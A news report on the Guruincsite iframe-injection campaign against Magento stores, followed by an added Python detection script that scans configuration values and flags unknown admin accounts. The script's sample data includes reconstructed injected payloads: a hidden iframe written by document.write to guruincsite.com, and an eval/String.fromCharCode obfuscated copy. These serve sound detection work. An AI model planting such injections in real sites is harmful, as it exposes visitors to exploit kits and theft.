Websites running the Magento CMS are being infected with malware in a fresh campaign which has impacted thousands of domains in a matter of days.
Over the weekend, researchers from Sucuri Labs said the attack involves the injection of malicious scripts through iframes from guruincsite.com.
There are two modified versions of the infection, and while one is obfuscated, the other is not -- giving security teams a virtual beacon to track the malicious domain involved in this latest attack on content management systems. According to the team, Google has already blacklisted almost 8,000 infected websites over the past 90 days. Webmasters in Google forums who have been affected by the campaign say malicious code has been found in design aspects of their Magento CMS systems, particularly within the Footer - Miscellaneous Scripts areas of their sites. Removing these scripts and then resubmitting clean websites back to Google for review should remove the blacklisting.
The Magento content management system, tailored for e-commerce, is used by over 200,000 companies worldwide. Sucuri is investigating the spread of Guruincsite and suspects "it was some vulnerability in Magento or one of the third-party extensions that allowed it to infect thousands of sites within a short time." However, the actual attack vector has yet to be discovered, potentially placing hundreds of thousands of online retail websites -- and any financial data stored within -- at risk.
Researchers from Malwarebytes say guruincsite is also linked to the infrastructure of a campaign using the Neutrino Exploit Kit. The "neitrino" campaign uses the same server-side attack that Sucuri noticed, but instead compromises domains client-side via web exploits. Websites compromised through a Flash exploit are harvested for financial data and also become slaves to a botnet system.
Sucuri recommends that webmasters make sure their systems are up to date and consider using website firewalls to better protect online domains. A number of webmasters with infected sites have noticed unidentified admin users appearing in their systems; removing such accounts immediately is the best course of action.
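As an added example (not code from the article, Sucuri or Magento), the following Python script implements the two checks the article describes for a Magento 1 store: scanning the stored "Miscellaneous Scripts/HTML" configuration values for the guruincsite.com iframe injection, including a variant hidden behind String.fromCharCode, and listing admin accounts that are not on a known allow-list. The core_config_data paths (design/head/includes, design/footer/absolute_footer, design/footer/copyright), the admin_user field names and every sample value are assumptions constructed for the demonstration; EXAMPLE_PATH is a placeholder, not the real URL used by the campaign. In practice the rows would be read from the store database rather than from the embedded list.

```python
import re

# Added example (not from the article, Sucuri or Magento): scan Magento 1
# config rows for the guruincsite.com injection and list admin accounts that
# are not on an allow-list. Config paths, column names and all sample values
# are constructed assumptions for the demonstration.

# Indicator taken from the article: the injected iframes point at this domain.
IOC_DOMAINS = ("guruincsite.com",)

# <iframe ...> or <script ...> tags carrying a src attribute.
TAG_RE = re.compile(r'<(?:iframe|script)\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# String.fromCharCode(104,116,...) calls used to hide strings from grep.
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\s*\(\s*([\d\s,]+)\)', re.I)
# Calls that tend to appear together in obfuscated injections.
OBFUSCATION_RE = re.compile(r'\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(', re.I)


def decode_fromcharcode(text):
    """Expand String.fromCharCode(...) calls into the text they build, so a
    domain hidden behind character codes becomes visible to the scan."""
    def expand(match):
        codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
        return "".join(chr(c) for c in codes)
    return FROMCHARCODE_RE.sub(expand, text)


def classify_value(value):
    """Return findings for one config value as (kind, detail) tuples."""
    findings = []
    decoded = decode_fromcharcode(value)
    lowered = decoded.lower()
    for domain in IOC_DOMAINS:
        if domain in lowered:
            srcs = [m.group(1) for m in TAG_RE.finditer(decoded)
                    if domain in m.group(1).lower()]
            findings.append(("ioc", srcs[0] if srcs else domain))
    # Two or more of these calls together is worth a manual review even when
    # no known domain is visible (an obfuscated variant may use another host).
    calls = sorted({c.lower() for c in OBFUSCATION_RE.findall(value)})
    if len(calls) >= 2:
        findings.append(("obfuscation", ", ".join(calls)))
    return findings


def scan_config_rows(rows):
    """Scan (path, value) rows; return {path: findings} for rows with findings."""
    report = {}
    for path, value in rows:
        findings = classify_value(value or "")
        if findings:
            report[path] = findings
    return report


def unknown_admin_users(users, known_usernames):
    """Return admin usernames not on the allow-list, oldest creation first."""
    unknown = [u for u in users if u["username"] not in known_usernames]
    return [u["username"] for u in sorted(unknown, key=lambda u: u["created"])]


# --- Constructed sample data (assumed to mirror core_config_data / admin_user) ---
_HIDDEN = ("document.write('<iframe src=\"http://guruincsite.com/EXAMPLE_PATH\" "
           "width=\"1\" height=\"1\"></iframe>')")
OBFUSCATED_VALUE = ("<script>eval(String.fromCharCode("
                    + ",".join(str(ord(c)) for c in _HIDDEN) + "))</script>")

SAMPLE_CONFIG_ROWS = [
    ("design/head/includes",
     '<link rel="stylesheet" href="/skin/frontend/default/shop/css/styles.css">'),
    ("design/footer/absolute_footer",
     '<script type="text/javascript">document.write(\'<iframe src="http://guruincsite.com/EXAMPLE_PATH" width="1" height="1" style="display:none"></iframe>\');</script>'),
    ("design/footer/copyright", OBFUSCATED_VALUE),
]

SAMPLE_ADMIN_USERS = [
    {"username": "shopadmin", "created": "2014-03-02 10:15:00"},
    {"username": "ops_backup", "created": "2015-06-11 09:00:00"},
    {"username": "sys_admin_01", "created": "2015-10-17 03:42:11"},
]
KNOWN_ADMINS = {"shopadmin", "ops_backup"}

if __name__ == "__main__":
    for path, findings in scan_config_rows(SAMPLE_CONFIG_ROWS).items():
        for kind, detail in findings:
            print(f"{path}: {kind}: {detail}")
    for name in unknown_admin_users(SAMPLE_ADMIN_USERS, KNOWN_ADMINS):
        print(f"unrecognised admin user: {name}")
```

The decoder deliberately runs before the domain match so that the obfuscated variant is caught by the same indicator as the plain one; the obfuscation heuristic is kept separate because it produces candidates for review rather than confirmed infections.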
A Magento spokesperson said: "We are actively investigating reports of Magento sites being targeted by Guruincsite malware (Neutrino exploit kit) and are working with our developers in coordination with Magento hosting partners and community members. We have NOT identified a new attack vector at this time but rather have found that all sites that we have checked show as vulnerable to a previously identified code execution issue for which we released a patch in early 2015. With the exception of one identified Magento Enterprise Edition merchant, we have not found any other enterprise clients that have been affected. Magento Security & Support Teams are actively working with the one Magento Enterprise Edition merchant impacted by this issue."